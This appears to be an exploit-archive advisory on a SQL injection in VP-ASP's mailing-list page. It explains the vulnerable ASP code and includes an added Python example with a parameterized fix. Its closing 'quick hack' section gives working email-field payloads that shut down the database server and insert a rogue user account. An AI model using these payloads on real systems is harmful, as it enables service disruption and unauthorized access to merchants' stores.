
VP-ASP-SQL.txt

Posted May 3, 2007
Authored by tracewar

VP-ASP suffers from a SQL injection vulnerability. Details provided.

tags | exploit, sql injection, asp
SHA-256 | 688110bd3b6796180b031f9d3cd1dc83a93d1a47dc937364764b82c320563468


************************************************** !!! WARNING !!! ***********************************************************
* FOR EDUCATIONAL PURPOSES ONLY! *
******************************************************************************************************************************
* Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *
* or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, *
* including without limitation any PC, other equipment or other property, even if I am Expressly advised of *
* the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit *
* criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, *
* and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read *
* this disclaimer. Once again this advisory is for educational purposes only. *
******************************************************************************************************************************

* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *

VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com).

The SQL injection exists in the UpdateCustomer procedure:

Sub UpdateCustomer
    if getconfig("xMYSQL")="Yes" then
        MYSQLMaillistUpdateCustomer
        exit sub
    end if
    dim dbc, whereok
    dim doupdate, templastname
    OpenCustomerDb dbc
    Set objRS = Server.CreateObject("ADODB.Recordset")
    ' strlastname has its single quotes doubled before it is used
    templastname=replace(strlastname,"'","''")
    SQL = "SELECT * FROM " & dbtable & " WHERE "
    whereok=""
    sql=sql & whereok & " LastName='" & TempLastName & "'"
    whereok = " AND "
    ' stremail is concatenated into the statement without any escaping
    SQL = SQL & whereok & " email='" & stremail & "'"
    objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText
    'debugwrite sql
    if not ObjRS.eof then
        DoUpdate="True"
    else
        objRs.close
        set objRS=nothing
    end if
    If Doupdate="" then
        Set objRS = Server.CreateObject("ADODB.Recordset")
        objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
        objRS.AddNew
    end if
    Updateminimuminfo objrs
    CloseRecordset objRS
    ShopCloseDatabase dbc
end sub

If you keep tracing the code, you will notice that the "stremail" value isn't checked properly for SQL injection before it reaches the query:

Else
    ValidateData()
    if sError = "" Then
        If unsubscribe="" then
            UpdateCustomer
            SendMailToMerchant LangMailListRegistration
            WriteInfo

The ValidateData() procedure is totally useless:

Sub ValidateData
    strFirstname = Request.Form("strFirstname")
    strLastname = Request.Form("strLastname")
    strEmail = Request.Form("strEmail")
    unsubscribe=request("blnmaillist")
    ValidateMininumInfo
End Sub

Sub ValidateMininumInfo
    BlnMailList=TRUE
    If strLastname = "" Then
        sError = sError & LangCustLastname & LangCustRequired & "<br>"
    End If
    If strEmail = "" Then
        sError = sError & LangCustEmail & LangCustRequired & "<br>"
    Else
        CustomerValidateEmail stremail
    end If
end sub

Sub CustomerValidateEmail (stremail)
    If Not InStr(strEmail, "@") > 1 Then
        Serror=Serror & LangInvalidEmail & "<br>"
    end if
End sub

The query must contain @ as a first character in order to pass the useless CustomerValidateEmail procedure.
Oh, and this is also the reason why SQL injection scanners didn't detect this injection earlier (HMPF HMPF *TIP* :P)
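
The same flaw and its fix, as an added example that is not part of the original advisory or of VP-ASP: a Python/SQLite model of the CustomerValidateEmail check and the UpdateCustomer lookup shown above, next to a parameterized version. The `customers` table, the sample row and the function names are constructed for illustration.

```python
import sqlite3

def customer_validate_email(email):
    """Port of CustomerValidateEmail: VBScript InStr(s, "@") > 1 holds when
    the first "@" is at 1-based position 2 or later. Nothing else is checked."""
    return email.find("@") + 1 > 1

def lookup_concat(db, last_name, email):
    """Mirrors UpdateCustomer: LastName gets its quotes doubled,
    email is pasted into the statement as-is."""
    temp_last = last_name.replace("'", "''")
    sql = ("SELECT * FROM customers WHERE LastName='" + temp_last + "'"
           " AND email='" + email + "'")
    return db.execute(sql).fetchall()

def lookup_param(db, last_name, email):
    """Hardened form: both values are bound parameters, never SQL text."""
    sql = "SELECT * FROM customers WHERE LastName=? AND email=?"
    return db.execute(sql, (last_name, email)).fetchall()

def make_db():
    """In-memory stand-in for the customer table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (LastName TEXT, email TEXT)")
    db.execute("INSERT INTO customers VALUES (?, ?)",
               ("O'Brien", "pat.o'brien@example.com"))
    return db

def demo():
    db = make_db()
    email = "pat.o'brien@example.com"  # constructed, benign input with a quote
    passed = customer_validate_email(email)
    try:
        lookup_concat(db, "O'Brien", email)
        concat_outcome = "ran"
    except sqlite3.Error:
        # The quote closed the string literal early: input was parsed as SQL.
        concat_outcome = "sql error"
    rows = lookup_param(db, "O'Brien", email)
    return passed, concat_outcome, rows

if __name__ == "__main__":
    print(demo())
```

In the ASP code itself the equivalent fix is an ADODB.Command with bound parameters in place of the string built in UpdateCustomer. Apostrophes are legal in e-mail addresses, so tightening the validator alone does not remove the need for parameter binding.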

quick hack:

write this as email: JUNK@';shutdown--
in order to shut down the SQL server.

write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--
in order to add user 'a' with password 'a'.

THE END.

* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *